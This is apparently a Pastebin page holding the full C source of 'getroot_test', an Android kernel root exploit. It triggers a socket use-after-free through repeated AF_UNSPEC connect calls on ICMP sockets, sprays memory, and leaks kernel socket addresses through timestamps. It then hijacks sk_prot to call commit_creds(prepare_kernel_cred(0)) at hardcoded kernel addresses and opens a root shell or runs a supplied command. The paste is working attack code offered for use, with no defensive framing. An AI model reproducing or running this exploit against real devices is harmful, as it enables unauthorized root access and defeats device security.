API tools faq
paste
Snow_Basinger

Untitled

Snow_Basinger
Sep 21st, 2015
219
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.73 KB | None | 0 0
raw download clone embed print report
  1. /* getroot_test 2015/09/15 */
  2.  
  3. /*
  4. * Copyright (C) 2015 CUBE
  5. *
  6. * This program is free software: you can redistribute it and/or modify
  7. * it under the terms of the GNU General Public License as published by
  8. * the Free Software Foundation, either version 3 of the License, or
  9. * (at your option) any later version.
  10. *
  11. * This program is distributed in the hope that it will be useful,
  12. * but WITHOUT ANY WARRANTY; without even the implied warranty of
  13. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
  14. * GNU General Public License for more details.
  15. *
  16. * You should have received a copy of the GNU General Public License
  17. * along with this program. If not, see <http://www.gnu.org/licenses/>.
  18. *
  19. */
  20.  
  21. #include <stdio.h>
  22. #include <stdbool.h>
  23. #include <stdlib.h>
  24. #include <stdint.h>
  25. #include <sys/mman.h>
  26. #include <sys/socket.h>
  27. #include <linux/in.h>
  28. #include <unistd.h>
  29. #include <errno.h>
  30. #include <sys/wait.h>
  31. #include <sys/sysinfo.h>
  32. #include <sys/system_properties.h>
  33.  
  34. #define THREAD_SIZE 8192
  35. #define KERNEL_START 0xc0000000
  36.  
  37. #define MAX_MMAPS 1024
  38. #define MMAP_ADDRESS(x) (0x10000000 + (x) * MMAP_SIZE)
  39. #define MMAP_BASE(x) (((unsigned)(x)) & ~(MMAP_SIZE - 1))
  40. #define MMAP_SIZE (16 * 1024 * 1024)
  41. #define TIMESTAMP_MAGIC 0x0deadbad
  42. #define ADDR_ADD(p,n) ((void *)((char *)(p) + (n)))
  43. #define OFFSET_SK_PROT 0x24
  44. #define OFFSET_SK_STAMP 0x148
  45. #define OFFSET_MC_LIST 0x1c4
  46.  
  47. #ifndef SIOCGSTAMPNS
  48. #define SIOCGSTAMPNS 0x8907
  49. #endif /* SIOCGSTAMPNS */
  50.  
  51. #define NSEC_PER_SEC 1000000000
  52. #define LIST_POISON2 0x00200200
  53. #define ARRAY_SIZE(x) (sizeof (x) / sizeof (*(x)))
  54.  
  55. #define EXECCOMMAND "/system/bin/sh"
  56.  
  57. struct thread_info;
  58. struct task_struct;
  59. struct cred;
  60. struct kernel_cap_struct;
  61. struct task_security_struct;
  62. struct list_head;
  63. struct thread_info {
  64. unsigned long flags;
  65. int preempt_count;
  66. unsigned long addr_limit;
  67. struct task_struct *task;
  68. };
  69. struct kernel_cap_struct {
  70. unsigned long cap[2];
  71. };
  72. struct cred {
  73. unsigned long usage;
  74. uid_t uid;
  75. gid_t gid;
  76. uid_t suid;
  77. gid_t sgid;
  78. uid_t euid;
  79. gid_t egid;
  80. uid_t fsuid;
  81. gid_t fsgid;
  82. unsigned long securebits;
  83. struct kernel_cap_struct cap_inheritable;
  84. struct kernel_cap_struct cap_permitted;
  85. struct kernel_cap_struct cap_effective;
  86. struct kernel_cap_struct cap_bset;
  87. unsigned char jit_keyring;
  88. void *thread_keyring;
  89. void *request_key_auth;
  90. void *tgcred;
  91. struct task_security_struct *security;
  92. };
  93. struct list_head {
  94. struct list_head *next;
  95. struct list_head *prev;
  96. };
  97. struct task_security_struct {
  98. unsigned long osid;
  99. unsigned long sid;
  100. unsigned long exec_sid;
  101. unsigned long create_sid;
  102. unsigned long keycreate_sid;
  103. unsigned long sockcreate_sid;
  104. };
  105. struct task_struct_partial {
  106. struct list_head cpu_timers[3];
  107. struct cred *real_cred;
  108. struct cred *cred;
  109. struct cred *replacement_session_keyring;
  110. char comm[16];
  111. };
  112.  
  113.  
  114. static inline struct thread_info *current_thread_info(void) {
  115. register unsigned long sp asm ("sp");
  116. return (struct thread_info *)(sp & ~(THREAD_SIZE - 1));
  117. }
  118.  
  119. static bool is_cpu_timer_valid(struct list_head *cpu_timer) {
  120. if (cpu_timer->next != cpu_timer->prev) {
  121. return false;
  122. }
  123.  
  124. if ((unsigned long int)cpu_timer->next < KERNEL_START) {
  125. return false;
  126. }
  127.  
  128. return true;
  129. }
  130.  
  131. struct cred;
  132. struct task_struct;
  133.  
  134. struct cred *(*prepare_kernel_cred)(struct task_struct *);
  135. int (*commit_creds)(struct cred *);
  136. void obtain_root_privilege_by_modify_task_cred(void) {
  137. prepare_kernel_cred = (void *)0xc01ba5f4;
  138. commit_creds = (void *)0xc01ba030;
  139. commit_creds(prepare_kernel_cred(0));
  140. }
  141.  
  142. static size_t get_page_size(void) {
  143. static size_t pagesize;
  144.  
  145. if (pagesize == 0) {
  146. pagesize = sysconf(_SC_PAGESIZE);
  147. }
  148.  
  149. return pagesize;
  150. }
  151.  
  152. static int maximize_fd_limit(void) {
  153. struct rlimit rlim;
  154. int ret;
  155.  
  156. ret = getrlimit(RLIMIT_NOFILE, &rlim);
  157. if (ret != 0) {
  158. return -1;
  159. }
  160.  
  161. rlim.rlim_cur = rlim.rlim_max;
  162. setrlimit(RLIMIT_NOFILE, &rlim);
  163.  
  164. ret = getrlimit(RLIMIT_NOFILE, &rlim);
  165. if (ret != 0) {
  166. return -1;
  167. }
  168.  
  169. return rlim.rlim_cur;
  170. }
  171.  
  172. static int setup_vul_socket(int sock) {
  173. struct sockaddr_in sa;
  174. int ret;
  175.  
  176. memset(&sa, 0, sizeof sa);
  177. sa.sin_family = AF_UNSPEC;
  178.  
  179. ret = connect(sock, (struct sockaddr *)&sa, sizeof sa);
  180. if (ret != 0) {
  181. printf("connect(%d) #1: ret = %d\n", sock, ret);
  182. return -1;
  183. }
  184.  
  185. ret = connect(sock, (struct sockaddr *)&sa, sizeof sa);
  186. if (ret != 0) {
  187. printf("connect%d() #2: ret = %d\n", sock, ret);
  188. return -1;
  189. }
  190.  
  191. return 0;
  192. }
  193.  
  194. static int create_icmp_socket(void) {
  195. struct sockaddr_in sa;
  196. int sock;
  197. int ret;
  198.  
  199. memset(&sa, 0, sizeof sa);
  200. sa.sin_family = AF_INET;
  201.  
  202. sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
  203. if (sock == -1) {
  204. return -1;
  205. }
  206.  
  207. ret = connect(sock, (struct sockaddr *)&sa, sizeof sa);
  208. if (ret != 0) {
  209. int result;
  210.  
  211. result = errno;
  212. close(sock);
  213. errno = result;
  214.  
  215. return -1;
  216. }
  217.  
  218. return sock;
  219. }
  220.  
  221. static int close_icmp_socket(int sock) {
  222. return close(sock);
  223. }
  224.  
  225. int *create_vul_sockets(void) {
  226. int max_fds;
  227. int *socks;
  228. int num_socks;
  229. int i;
  230.  
  231. max_fds = maximize_fd_limit();
  232. printf("max_fds=%d\n", max_fds);
  233.  
  234. printf("Creating target socket...");
  235. fflush(stdout);
  236.  
  237. socks = malloc((max_fds + 1) * sizeof (*socks));
  238. if (!socks) {
  239. printf("\nNo memory.\n");
  240. return NULL;
  241. }
  242.  
  243. num_socks = 0;
  244. for (i = 0; i < 3072; i++) {
  245. if (num_socks < max_fds) {
  246. socks[num_socks] = create_icmp_socket();
  247. if (socks[num_socks] == -1) {
  248. break;
  249. }
  250. num_socks++;
  251. }
  252. }
  253.  
  254. printf("OK.\n");
  255. printf("%d sockets created.\n", num_socks);
  256.  
  257. if (num_socks < 1) {
  258. printf("No icmp socket available.\n");
  259. free(socks);
  260. return NULL;
  261. }
  262.  
  263. socks[num_socks] = -1;
  264.  
  265. for (i = 0; i < num_socks - 1; i++) {
  266. setup_vul_socket(socks[i]);
  267. }
  268.  
  269. return socks;
  270. }
  271.  
  272. static int lock_page_in_memory(void *address, size_t size) {
  273. int ret;
  274.  
  275. ret = mlock(address, size);
  276. if (ret != 0) {
  277. return -1;
  278. }
  279.  
  280. return 0;
  281. }
  282.  
  283. static void populate_pagetable_for_address(void *address) {
  284. *(void **)address = NULL;
  285. }
  286.  
  287. static void *protect_crash_when_double_free(void) {
  288. void *address;
  289. size_t pagesize;
  290.  
  291. pagesize = get_page_size();
  292. address = (void *)((LIST_POISON2 / pagesize) * pagesize);
  293. address = mmap(address, pagesize, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);
  294.  
  295. if (address == MAP_FAILED) {
  296. return NULL;
  297. }
  298.  
  299. populate_pagetable_for_address(address);
  300. lock_page_in_memory(address, pagesize);
  301.  
  302. return address;
  303. }
  304.  
  305. static int free_protect(void *protect) {
  306. size_t pagesize;
  307.  
  308. pagesize = get_page_size();
  309. return munmap(protect, pagesize);
  310. }
  311.  
  312. static void fill_with_payload(void *address, size_t size) {
  313. unsigned *p = address;
  314. int i;
  315.  
  316. for (i = 0; i < size; i += sizeof (*p) * 2) {
  317. *p++ = (unsigned)p;
  318. *p++ = TIMESTAMP_MAGIC;
  319. }
  320. }
  321.  
  322. static int get_sk_from_timestamp(int sock) {
  323. struct timespec tv;
  324. uint64_t value;
  325. unsigned high;
  326. unsigned low;
  327. int ret;
  328.  
  329. ret = ioctl(sock, SIOCGSTAMPNS, &tv);
  330. if (ret != 0) {
  331. return -1;
  332. }
  333.  
  334. value = ((uint64_t)tv.tv_sec * NSEC_PER_SEC) + tv.tv_nsec;
  335. high = (unsigned)(value >> 32);
  336. low = (unsigned)value;
  337.  
  338. if (high == TIMESTAMP_MAGIC) {
  339. return low - OFFSET_SK_STAMP;
  340. }
  341.  
  342. return 0;
  343. }
  344.  
  345. static int try_control_sk(int *socks) {
  346. static void *address[MAX_MMAPS];
  347. int success;
  348. int count;
  349. int i;
  350. int ret;
  351.  
  352. success = 0;
  353. count = 0;
  354. for (i = 0; i < MAX_MMAPS; i++) {
  355. int j;
  356.  
  357. address[i] = mmap((void *)MMAP_ADDRESS(i), MMAP_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);
  358.  
  359. if (address[i] == MAP_FAILED) {
  360. printf("mmap(): failed: %s (%d)\n", strerror(errno), errno);
  361. break;
  362. }
  363.  
  364. count++;
  365.  
  366. lock_page_in_memory(address[i], MMAP_SIZE);
  367. fill_with_payload(address[i], MMAP_SIZE);
  368.  
  369. for (j = 0; socks[j] != -1; j++) {
  370. ret = get_sk_from_timestamp(socks[j]);
  371. if (ret > 0) {
  372. success = 1;
  373. address[i] = 0;
  374. }
  375. }
  376.  
  377. if (success) {
  378. break;
  379. }
  380. }
  381.  
  382. printf("%08x bytes allocated.\n", (unsigned int)(count * MMAP_SIZE));
  383.  
  384. for (i = 0; i < count; i++) {
  385. if (address[i]) {
  386. munmap(address[i], MMAP_SIZE);
  387. }
  388. }
  389.  
  390. if (success) {
  391. return 0;
  392. }
  393.  
  394. return -1;
  395. }
  396.  
  397. static int setup_get_root(void *sk) {
  398. static unsigned prot[256];
  399. unsigned *mmap_end_address;
  400. unsigned *p;
  401. int i;
  402.  
  403. for (i = 0; i < ARRAY_SIZE(prot); i++) {
  404. prot[i] = (unsigned)obtain_root_privilege_by_modify_task_cred;
  405. }
  406.  
  407. mmap_end_address = (void *)MMAP_BASE(sk) + MMAP_SIZE - 1;
  408.  
  409. for (i = OFFSET_MC_LIST - 32; i < OFFSET_MC_LIST + 32; i+= 4) {
  410. p = ADDR_ADD(sk, i);
  411. if (p > mmap_end_address) {
  412. break;
  413. }
  414.  
  415. *p = 0;
  416. }
  417.  
  418. for (i = OFFSET_SK_PROT - 32; i < OFFSET_SK_PROT + 32; i+= 4) {
  419. p = ADDR_ADD(sk, i);
  420. if (p > mmap_end_address) {
  421. break;
  422. }
  423. *p = (unsigned)prot;
  424. }
  425. }
  426.  
  427. static void keep_invalid_sk(void) {
  428. pid_t pid;
  429.  
  430. printf("\n");
  431. printf("There are some invalid sockets.\n");
  432. printf("Please reboot now to avoid crash...\n");
  433.  
  434. pid = fork();
  435. if (pid == -1 || pid == 0) {
  436. close(0);
  437. close(1);
  438. close(2);
  439.  
  440. while (1) {
  441. sleep(60);
  442. }
  443. }
  444. }
  445.  
  446. static int do_get_root(int *socks) {
  447. int ret;
  448. int i;
  449.  
  450. for (i = 0; socks[i] != -1; i++) {
  451. void *sk;
  452.  
  453. ret = get_sk_from_timestamp(socks[i]);
  454. if (ret <= 0) {
  455. if (ret == 0) {
  456. printf("-");
  457. } else {
  458. printf("x");
  459. }
  460. fflush(stdout);
  461. continue;
  462. }
  463.  
  464. sk = (void *)ret;
  465. //printf(" sk=%08x ", (unsigned int)sk);
  466. printf("o");
  467. fflush(stdout);
  468. setup_get_root(sk);
  469.  
  470. close_icmp_socket(socks[i]);
  471. break;
  472. }
  473. printf("\n");
  474. }
  475.  
  476. int run_exploit() {
  477. int *socks;
  478. int ret;
  479.  
  480. socks = create_vul_sockets();
  481. if (socks == NULL) {
  482. return 1;
  483. }
  484.  
  485. while (1) {
  486. ret = try_control_sk(socks);
  487. if (ret == 0) {
  488. printf("Done!\n");
  489. break;
  490. }
  491. }
  492.  
  493. do_get_root(socks);
  494.  
  495. return 0;
  496. }
  497.  
  498. int main(int argc, char **argv) {
  499. char devicename[PROP_VALUE_MAX];
  500. char buildid[PROP_VALUE_MAX];
  501.  
  502. void *protect = NULL;
  503. int ret;
  504.  
  505. __system_property_get("ro.build.product", devicename);
  506. __system_property_get("ro.build.id", buildid);
  507. printf("ro.build.product=%s\n", devicename);
  508. printf("ro.build.id=%s\n", buildid);
  509.  
  510. protect = protect_crash_when_double_free();
  511. if (!protect) {
  512. printf("Error in protect_crash_when_double_free()\n");
  513. return 1;
  514. }
  515.  
  516. run_exploit();
  517.  
  518. if (getuid() != 0) {
  519. printf("Failed to getroot.\n");
  520. exit(EXIT_FAILURE);
  521. }
  522.  
  523. printf("Succeeded in getroot!\n");
  524. printf("\n");
  525.  
  526. if (argc >= 2) {
  527. system(argv[1]);
  528. } else {
  529. system(EXECCOMMAND);
  530. }
  531.  
  532. keep_invalid_sk();
  533.  
  534. if (protect) {
  535. ret = free_protect(protect);
  536. if (ret != 0) {
  537. printf("Error in free_protect()\n");
  538. return -1;
  539. }
  540. }
  541.  
  542. exit(EXIT_SUCCESS);
  543. return 0;
  544. }
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!